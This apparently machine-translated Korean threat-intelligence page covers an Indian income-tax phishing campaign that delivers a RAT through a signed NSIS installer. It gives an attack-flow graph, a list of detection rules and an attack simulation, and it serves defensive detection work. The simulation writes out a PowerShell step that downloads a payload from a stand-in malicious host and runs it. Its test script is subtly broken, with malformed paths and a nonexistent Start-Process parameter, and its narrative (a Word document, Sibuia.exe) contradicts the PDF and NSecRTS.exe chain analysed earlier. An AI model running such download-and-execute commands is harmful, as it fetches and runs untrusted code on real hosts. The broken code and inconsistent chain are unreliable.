팔로우
요약
인도 소득세청을 사칭한 피싱 작업에서는 수신자를 가짜 준수 포털로 유도하는 트랩 PDF를 제공합니다. 이 사이트는 피해자에게 서명된 NSIS 설치 프로그램이 포함된 ZIP 패키지를 다운로드하라고 요청하며, 이후 여러 단계의 원격 액세스 트로이 목마(RAT)를 배포합니다. RAT는 Windows 서비스를 생성하고 비표준 포트를 통해 여러 C2 서버와 통신하여 지속성을 유지합니다.
조사
연구원들은 PDF 유인물, 내장 URL 및 연결된 NSIS 설치 프로그램 워크플로우를 분석했습니다. 그들은 디스크에 드롭된 바이너리, 숨겨진 설치 폴더 생성 및 NSecRTS.exe 를 Windows 서비스로 등록하는 과정을 문서화했습니다. 또한 외부 통신을 세 개의 IP 주소로 캡처하고 전송 체인 전반에 걸쳐 서명된 페이로드 사용을 강조했습니다.
완화
말리시오스 도메인과 관련 IP 주소를 주변과 프록시 제어를 통해 차단하십시오. 세금 테마의 첨부 파일과 유사한 준수 포털로 이어지는 링크를 플래그하기 위해 이메일 보호를 강화하십시오. 자동 설치자의 자동 실행을 가능하면 방지하고 의심스러운 서비스 생성 특히 “Windows 실시간 보호 서비스.”
대응
파일 이름, 해시 및 감염 체인에 연결된 Windows 서비스 등록 활동에 경고하십시오. 영향받은 엔드포인트를 격리하고, 메모리 및 디스크 이미지를 수집하며, 추가적인 RAT 단계나 도구를 식별하기 위해 전체 포렌식 검사를 수행하십시오. 지속성 아티팩트를 제거하고 잠재적으로 노출된 자격 증명을 재설정하여 재입력을 방지하십시오.
graph TB %% 클래스 정의 classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% 노드 – 액션 (MITRE 기법) action_phishing_attachment[“<b>행위</b> – T1566.001: <b>스피어피싱 첨부파일</b><br/>악성 PDF “Review Annexure.pdf”가 포함된 이메일이 피해자에게 전달됨.”] class action_phishing_attachment action action_phishing_link[“<b>행위</b> – T1566.002: <b>스피어피싱 링크</b><br/>PDF에 가짜 소득세 포털(hxxps://www.akjys.top/)로 연결되는 링크가 포함됨.”] class action_phishing_link action action_user_execution[“<b>행위</b> – T1204.002: <b>사용자 실행</b><br/>피해자가 링크를 클릭하면 ZIP 파일이 자동으로 다운로드되고 설치 프로그램이 실행됨.”] class action_user_execution action action_code_signing[“<b>행위</b> – T1553.002: <b>코드 서명</b><br/>합법적으로 보이는 인증서로 서명된 NSIS 설치 프로그램.”] class action_code_signing action action_signed_binary_proxy[“<b>행위</b> – T1218: <b>서명된 바이너리 프록시 실행</b><br/>서명된 NSIS 설치 프로그램이 악성 페이로드를 실행하여 보안 통제를 우회함.”] class action_signed_binary_proxy action action_obfuscation[“<b>행위</b> – T1027.002: <b>소프트웨어 패킹</b><br/>다단계 NSIS 래퍼가 악성 바이너리를 암호화하고 은폐함.”] class action_obfuscation action action_persistence_service_perm[“<b>행위</b> – T1574.010: <b>서비스 파일 권한 취약점</b><br/>설치 프로그램이 서비스 파일 권한을 수정함.”] class action_persistence_service_perm action action_persistence_service[“<b>행위</b> – T1569.002: <b>서비스 실행</b><br/>NSecRTS.exe를 Windows 서비스 “Windows Real-time Protection Service”로 등록함.”] class action_persistence_service action action_discovery_system[“<b>행위</b> – T1082: <b>시스템 정보 수집</b><br/>RAT가 운영체제 버전 및 하드웨어 정보를 수집함.”] class action_discovery_system action action_discovery_software[“<b>행위</b> – T1518: <b>소프트웨어 탐색</b><br/>RAT가 설치된 애플리케이션과 서비스를 열거하고 데이터를 C:\Program Files\Common Files\NSEC\Data에 저장함.”] class action_discovery_software action action_c2_web[“<b>행위</b> – T1071.001: <b>웹 프로토콜</b><br/>HTTP/HTTPS를 통한 C2 통신.”] class action_c2_web action action_c2_nonstandard[“<b>행위</b> – T1571: <b>비표준 포트</b><br/>C2 트래픽에 포트 48991, 48992, 3898을 사용함.”] class action_c2_nonstandard action action_c2_bidirectional[“<b>행위</b> – T1102.002: <b>양방향 웹 서비스</b><br/>서버와의 양방향 통신을 가능하게 함.”] class action_c2_bidirectional action action_remote_access[“<b>행위</b> – T1219: <b>원격 접근 도구</b><br/>공격자가 명령을 실행하고 데이터를 탈취하며 제어를 유지함.”] class action_remote_access action action_exfiltration_scheduled[“<b>행위</b> – T1029: <b>예약된 전송</b><br/>수집된 데이터가 주기적으로 C2 서버로 POST 전송됨.”] class action_exfiltration_scheduled action action_defense_evasion[“<b>행위</b> – T1070.004: <b>파일 삭제</b><br/>로더가 실행 후 드롭된 파일과 임시 폴더를 삭제함.”] class action_defense_evasion action action_multi_stage[“<b>행위</b> – T1104: <b>다단계 채널</b><br/>연속적인 설치 프로그램이 최종 RAT 페이로드를 전달함.”] class action_multi_stage action %% 노드 – 도구 / 파일 / 멀웨어 tool_nsis_installer[“<b>도구</b> – <b>이름</b>: NSIS 설치 프로그램<br/><b>설명</b>: 페이로드를 부트스트랩하기 위해 사용되는 서명된 설치 프로그램.”] class tool_nsis_installer tool malware_rat[“<b>멀웨어</b> – <b>이름</b>: NSEC RAT<br/><b>설명</b>: 시스템 전체 제어를 제공하는 원격 접근 트로이 목마.”] class malware_rat malware file_pdf[“<b>파일</b> – <b>이름</b>: Review Annexure.pdf<br/><b>유형</b>: 악성 PDF 첨부파일.”] class file_pdf file file_zip[“<b>파일</b> – <b>이름</b>: Review Annexure.zip<br/><b>유형</b>: NSIS 설치 프로그램을 포함한 아카이브.”] class file_zip file file_exe[“<b>파일</b> – <b>이름</b>: NSecRTS.exe<br/><b>유형</b>: Windows에 등록된 서비스 실행 파일.”] class file_exe file %% 연결 – 공격 흐름 action_phishing_attachment –>|포함| file_pdf file_pdf –>|연결됨| action_phishing_link action_phishing_link –>|이어짐| file_zip file_zip –>|실행 주체| action_user_execution action_user_execution –>|사용| tool_nsis_installer tool_nsis_installer –>|서명됨| action_code_signing action_code_signing –>|활성화| action_signed_binary_proxy action_signed_binary_proxy –>|난독화 경로| action_obfuscation action_obfuscation –>|생성| malware_rat malware_rat –>|설치됨| action_persistence_service_perm action_persistence_service_perm –>|활성화| action_persistence_service action_persistence_service –>|실행| file_exe file_exe –>|수집| action_discovery_system file_exe –>|수집| action_discovery_software action_discovery_system –>|데이터 전송| action_c2_web action_discovery_software –>|데이터 전송| action_c2_web action_c2_web –>|포트 사용| action_c2_nonstandard action_c2_web –>|채널 사용| action_c2_bidirectional action_c2_bidirectional –>|제공| action_remote_access action_remote_access –>|수행| action_exfiltration_scheduled action_exfiltration_scheduled –>|트리거| action_defense_evasion action_defense_evasion –>|선행| action_multi_stage %% 스타일 class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
공격 흐름
탐지
의심스러운 명령 및 제어: 비정상적인 최상위 도메인(TLD)의 DNS 요청 (dns를 통해)
View
탐지할 IOC(목적지 IP): 인도 소득세 테마 피싱 캠페인이 지역 사업체를 대상으로 함
View
탐지할 IOC(출처 IP): 인도 소득세 테마 피싱 캠페인이 지역 사업체를 대상으로 함
View
탐지할 IOC(HashMd5): 인도 소득세 테마 피싱 캠페인이 지역 사업체를 대상으로 함
View
인도 소득세 테마 피싱 캠페인의 맬웨어 실행 탐지 [Windows 프로세스 생성]
View
NSecRTS.exe C2 통신 탐지 [Windows 네트워크 연결]
View
시뮬레이션 실행
필수사항: 원격 측정 및 기준선 사전 비행 검사가 통과되어야 합니다.
이유: 이 섹션은 탐지 규칙을 촉발하기 위해 설계된 상대 기술(TTP)의 구체적인 실행을 자세히 설명합니다. 명령어와 서사는 식별된 TTPs를 직접 반영하고 탐지 로직에 의해 기대되는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다.
-
공격 서사 & 명령어:
상대는 ‘소득세 통지’라는 제목의 피싱 이메일을 제공합니다. 첨부된 것은setup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%에 악성 Word 문서를 떨어뜨립니다. 피해자가 파일을 실행하면Sibuia.exe(진정한 페이로드)라는 자식을 생성합니다. 이 부모-자식 체인은 일반적인 프로세스 생성 경고를 우회하도록 설계되었지만 Sigma 규칙에 의해 포착됩니다.침입된 호스트에서 수행된 단계:
- 1단계 바이너리 드롭:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - 1단계 바이너리 실행:
Start-Process -FilePath $stage1 -NoNewWindow - 1단계 바이너리는 내부적으로 같은 디렉터리에 2단계 바이너리를 생성하고 실행합니다:
Sibuia.exe(아래 테스트 스크립트로 시뮬레이션됨.) 회귀 테스트 스크립트:
- 1단계 바이너리 드롭:
-
아래 스크립트는 규칙을 작동시키기 위해 필요한 정확한 부모-자식 관계를 재현합니다.
# ————————————————- # 인도 소득세 피싱 체인의 시뮬레이션 # ————————————————- # 경로 설정 $stage1 = “$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe” $stage2 = “$env:TEMPSibuia.exe” # 더미 바이너리 생성 (제로 바이트 – Sysmon 로깅에 충분) Set-Content -Path $stage1 -Value ‘REM stage1 placeholder’ -Encoding ASCII Set-Content -Path $stage2 -Value ‘REM stage2 placeholder’ -Encoding ASCII # 파일이 실행 가능하도록 보장 (Windows에는 chmod 필요하지 않음) Write-Host “[*] 1단계 시작 중…” $proc1 = Start-Process -FilePath $stage1 -PassThru # 1단계가 2단계를 ‘스폰’하도록 순간을 줌(직접 실행으로 시뮬레이션됨) Start-Sleep -Milliseconds 500 Write-Host “[*] 1단계가 2단계(Sibuia.exe)를 스폰 중…” $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host “[+] 시뮬레이션 완료. SIEM에서 탐지 확인.” # ————————————————-# ------------------------------------------------- # Simulation of Indian Income‑Tax phishing chain # ------------------------------------------------- # Define paths $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Create dummy binaries (zero‑byte – sufficient for Sysmon logging) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Ensure files are executable (Windows does not need chmod) Write-Host "[*] Launching stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Give stage1 a moment to “spawn” stage2 (simulated by direct launch) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 spawning stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulation complete. Verify detection in SIEM." # ------------------------------------------------- -
정리 명령어:
아티팩트를 제거하고 남아 있는 프로세스를 종료합니다.# 남아 있는 프로세스 종료 Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # 파일 삭제 Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] 정리 완료."